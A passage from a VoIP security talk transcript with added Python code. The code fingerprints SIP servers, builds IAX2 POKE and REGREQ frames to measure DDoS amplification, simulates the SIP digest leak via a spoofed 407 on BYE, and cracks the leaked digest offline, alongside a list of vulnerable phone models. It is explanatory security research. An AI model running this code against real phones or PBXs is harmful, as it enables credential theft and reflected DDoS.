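    code, _ = parse_response(raw)
    return {404: "unknown", 200: "exists-no-auth",
            401: "exists-auth", 407: "exists-auth"}.get(code, "other:%d" % code)


# Sample 1: the Asterisk 404 of slide 17 (User-Agent renamed by the admin).
ASTERISK_404 = (
    "SIP/2.0 404 Not found\r\n"
    "Via: SIP/2.0/UDP 1.1.1.1:5061;branch=z9hG4bK-59472;received=1.1.1.1;rport=5061\r\n"
    'From: "test" <sip:100@1.2.3.4:5060>;tag=d5a5bd3213c46cdd060c\r\n'
    'To: "test" <sip:100@1.2.3.4:5060>;tag=as05610bff\r\n'
    "Call-ID: 37012f88-24ac-44aa-ac45-2e6a05421e7d\r\n"
    "CSeq: 1 REGISTER\r\n"
    "User-Agent: MyVeryOwn PBX\r\n"
    "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\n"
    "Content-Length: 0\r\n\r\n")

# Sample 2: constructed 401 modelled on the registrar reply of slide 24
# (lower-case "Cseq"/"Call-id", reversed order); tag and nonce are made up.
REGISTRAR_401 = (
    "SIP/2.0 401 Unauthorized\r\n"
    "Via: SIP/2.0/UDP 3.2.1.9:5061;branch=z9hG4bK-1;received=3.2.1.9\r\n"
    'From: "hello" <sip:100@1.2.3.40:5060>;tag=d90a4f8a13c4d8bf89f5\r\n'
    'To: "hello" <sip:100@1.2.3.40:5060>;tag=7f3a9c\r\n'
    "Cseq: 1 REGISTER\r\n"
    "Call-id: 6a53b3b9-3c0b-47d3-9e7f-b024ffe74663\r\n"
    'WWW-Authenticate: Digest realm="sipgate.at", nonce="0123abcd"\r\n'
    "Content-Length: 0\r\n\r\n")

if __name__ == "__main__":
    for sample in (ASTERISK_404, REGISTRAR_401):
        print(fingerprint(sample), classify_register(sample))
```

A scanner feeds the raw UDP payload of each reply to fingerprint() and classify_register(); checking the To tag and header hash rather than trusting User-Agent is what keeps the renamed stack of slide 17 from hiding.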
  • 35. demo

  • 36. DDoS using IAX2?
    [diagram: a client sends REGREQ to Asterisk (*), receives REGREJ and answers with ACK]

  • 37. DDoS using IAX2?
    [diagram: the attacker sends REGREQ, receives REGREJ and never sends the ACK]

  • 38. DDoS using IAX2?
    [diagram: the unacknowledged REGREJ is retransmitted]

  • 39. DDoS using IAX2?
    [diagram: the REGREJ is retransmitted again]

  • 40. DDoS using IAX2?
    [diagram: the attacker sends the REGREQ, but the stream of REGREJ retransmissions lands on a third party, who ACKs]

  • 41. DDoS using IAX2?
    [diagram: many Asterisk boxes (*) at once aim their replies at the same target]

  • 42. DDoS using IAX2?
    [diagram: same as slide 41; the target is overwhelmed]
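The IAX2 frames behind slides 14 and 36 to 42, as an added example (not VOIPPACK or SIPVicious code). It encodes and decodes IAX2 full frames per RFC 5456, builds the POKE probe, checks that a reply is the matching PONG, and works out how much traffic a single REGREQ draws when the REGREJ is never acknowledged. The reply frames, call numbers, timestamps and cause text are constructed stand-ins for what an Asterisk box would send, not captured traffic.

```python
import struct

# Added example, not SIPVicious/VOIPPACK code. IAX2 full frame (RFC 5456,
# 12-byte header): bit 15 of the source call number (F) marks a full frame,
# bit 15 of the destination call number (R) marks a retransmission.

IAX2_PORT = 4569
FRAME_TYPE_IAX = 0x06            # "IAX control" frame type
SUB_PONG, SUB_ACK, SUB_REGREQ, SUB_REGREJ, SUB_POKE = 0x03, 0x04, 0x0D, 0x10, 0x1E
IE_USERNAME, IE_CAUSE = 0x06, 0x16


def build_full_frame(scallno, dcallno, ts, oseqno, iseqno, ftype, subclass,
                     payload=b"", retrans=False):
    if not 0 < scallno < 0x8000 or not 0 <= dcallno < 0x8000:
        raise ValueError("call numbers are 15-bit")
    header = struct.pack("!HHIBBBB",
                         0x8000 | scallno,
                         (0x8000 if retrans else 0) | dcallno,
                         ts & 0xFFFFFFFF, oseqno & 0xFF, iseqno & 0xFF,
                         ftype, subclass)
    return header + payload


def encode_ie(ie_id, data):
    """Information element: 1-byte id, 1-byte length, data."""
    if len(data) > 255:
        raise ValueError("IE too long")
    return bytes([ie_id, len(data)]) + data


def decode_ies(payload):
    ies, i = {}, 0
    while i + 2 <= len(payload):
        ie_id, length = payload[i], payload[i + 1]
        ies[ie_id] = payload[i + 2:i + 2 + length]
        i += 2 + length
    return ies


def parse_full_frame(data):
    if len(data) < 12:
        raise ValueError("frame shorter than a full-frame header")
    s, d, ts, oseq, iseq, ftype, sub = struct.unpack("!HHIBBBB", data[:12])
    if not s & 0x8000:
        raise ValueError("F bit clear: mini frame, not a full frame")
    return {"scallno": s & 0x7FFF, "dcallno": d & 0x7FFF,
            "retrans": bool(d & 0x8000), "timestamp": ts,
            "oseqno": oseq, "iseqno": iseq, "type": ftype, "subclass": sub,
            "ies": decode_ies(data[12:])}


def build_poke(scallno=1):
    # POKE carries no IEs; no call exists yet, so the destination is 0.
    return build_full_frame(scallno, 0, 0, 0, 0, FRAME_TYPE_IAX, SUB_POKE)


def is_pong_for(poke, reply):
    """The PONG answering our POKE is an IAX frame whose destination call
    number is the source call number we picked (slide 14)."""
    p, r = parse_full_frame(poke), parse_full_frame(reply)
    return (r["type"] == FRAME_TYPE_IAX and r["subclass"] == SUB_PONG
            and r["dcallno"] == p["scallno"])


def build_regreq(username, scallno=2):
    return build_full_frame(scallno, 0, 0, 0, 0, FRAME_TYPE_IAX, SUB_REGREQ,
                            encode_ie(IE_USERNAME, username.encode()))


def amplification(request, replies):
    """Bytes the server emitted per byte received, plus the count of
    retransmitted replies. With no ACK the REGREJ is resent, so one small
    REGREQ draws several larger REGREJs: the DDoS angle of slides 36-42."""
    retrans = sum(1 for r in replies if parse_full_frame(r)["retrans"])
    return sum(len(r) for r in replies) / len(request), retrans


# Constructed frames standing in for an Asterisk box's replies; call numbers,
# timestamps and the cause text are assumptions.
POKE = build_poke(scallno=1)
PONG = build_full_frame(3, 1, 5, 0, 1, FRAME_TYPE_IAX, SUB_PONG)
REGREQ = build_regreq("scanner", scallno=2)
REGREJ_IES = encode_ie(IE_CAUSE, b"Registration Refused")
REGREJS = [build_full_frame(4, 2, 10 * (i + 1), 0, 1, FRAME_TYPE_IAX, SUB_REGREJ,
                            REGREJ_IES, retrans=(i > 0)) for i in range(4)]

if __name__ == "__main__":
    print("PONG matches POKE:", is_pong_for(POKE, PONG))
    ratio, retrans = amplification(REGREQ, REGREJS)
    print("amplification x%.1f with %d retransmissions" % (ratio, retrans))
```

Sending build_poke() to UDP/4569 and passing the reply to is_pong_for() is the whole of slide 14's probe. The amplification() figure here comes from four constructed frames and says nothing about real retransmit counts, which depend on the server's retry schedule.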
  • 43. (image-only slide)

  • 44. SIP Digest Auth
    • REGISTER usually gets a 401 Unauthorized
    • INVITE gets a 407 Proxy Authentication
    • Challenge response mechanism
    • Takes various properties + password
    • Nonce, Method, URI

  • 45. Digest Leak
    [diagram: the attacker INVITEs the phone; the phone answers 200 OK]

  • 46. Digest Leak
    [diagram: the phone sends BYE; the attacker replies with a 407 challenge, and the phone answers the challenge, leaking its digest response]

  • 47. demo
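The digest computation of slide 44 and the BYE/407 exchange of slides 45 and 46, written out from both sides as an added example (not SIPVicious code). Extension 100, realm pbx.example, password 1234 and the attacker URI are constructed values; the challenge carries no qop, so the response is MD5(HA1:nonce:HA2) as in RFC 2617 without quality-of-protection.

```python
import hashlib
import re
import secrets

# Added example, not SIPVicious code. SIP digest (RFC 3261 section 22 reuses
# RFC 2617) and the digest leak: the attacker challenges the phone's BYE with
# a 407 and receives a response it can brute-force offline. All identities,
# the realm and the password below are constructed.


def md5hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """The password enters only through HA1; nonce, method and URI are
    public, so anyone holding the response can test candidate passwords."""
    ha1 = md5hex("%s:%s:%s" % (username, realm, password))
    ha2 = md5hex("%s:%s" % (method, uri))
    if qop:
        return md5hex(":".join([ha1, nonce, nc, cnonce, qop, ha2]))
    return md5hex("%s:%s:%s" % (ha1, nonce, ha2))


def parse_digest_params(header_value):
    """'Digest username="100", realm="pbx.example", algorithm=MD5' -> dict."""
    scheme, _, params = header_value.partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest header: %r" % header_value)
    return {k: v.strip().strip('"')
            for k, v in re.findall(r'(\w+)\s*=\s*("[^"]*"|[^,]+)', params)}


def build_challenge(realm, nonce=None):
    """Proxy-Authenticate value the attacker puts in the 407 that answers the
    phone's BYE. No qop, so the phone computes MD5(HA1:nonce:HA2)."""
    nonce = nonce or secrets.token_hex(16)
    return 'Digest realm="%s", nonce="%s", algorithm=MD5' % (realm, nonce)


def build_authorization(username, password, method, uri, challenge):
    """Proxy-Authorization value the phone puts in the repeated BYE."""
    c = parse_digest_params(challenge)
    resp = digest_response(username, c["realm"], password, method, uri, c["nonce"])
    return ('Digest username="%s", realm="%s", nonce="%s", uri="%s", '
            'response="%s", algorithm=MD5'
            % (username, c["realm"], c["nonce"], uri, resp))


def crack_leaked_digest(auth_header, method, wordlist):
    """Offline guessing against the leaked value: every input except the
    password is in the header, so it costs one MD5 chain per candidate."""
    p = parse_digest_params(auth_header)
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate, method,
                                p["uri"], p["nonce"], p.get("qop"),
                                p.get("nc"), p.get("cnonce"))
        if guess == p["response"]:
            return candidate
    return None


def simulate_digest_leak(password, realm="pbx.example", extension="100"):
    """Slides 45-46 after the call is answered: the phone hangs up with a
    BYE, the attacker challenges it, the phone re-sends BYE with credentials.
    Returns the Proxy-Authorization header the attacker ends up holding."""
    uri = "sip:attacker@203.0.113.10"        # attacker's own URI (constructed)
    challenge = build_challenge(realm)       # carried in the 407
    return build_authorization(extension, password, "BYE", uri, challenge)


if __name__ == "__main__":
    leaked = simulate_digest_leak("1234")
    print("leaked:", leaked)
    print("cracked:", crack_leaked_digest(leaked, "BYE",
                                          ["0000", "1111", "1234", "secret"]))
```

Because the attacker picks the nonce and already knows the method and URI, the leaked response is a hash of the password alone, crackable offline at MD5 speed; the phone should only answer challenges that come from the proxy or registrar it is configured for.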
  • 48. Vulnerable endpoints
    • X-lite
    • Gizmo5
    • Zoiper

  • 49. Vulnerable endpoints
    • Cisco 7940
    • Grandstream GXP*
    • Patton Smartlink
    • Linksys SPA942
    • Fritzbox

  • 50. But ...
    • There's no SIP Phones on the 'net!
    • There are ;-)
    • The 'net is full of Fritzbox
    • Internal endpoints behind NAT

  • 51. More at..
    • EnableSecurity.com/research
    • Sipvicious.org
    • VOIPSA.org

  • 52. Shoutouts!
    • Sjur at usken.no
    • dudes from .mt =)

  • 53. Q&A

  • 54. sandro@enablesecurity.com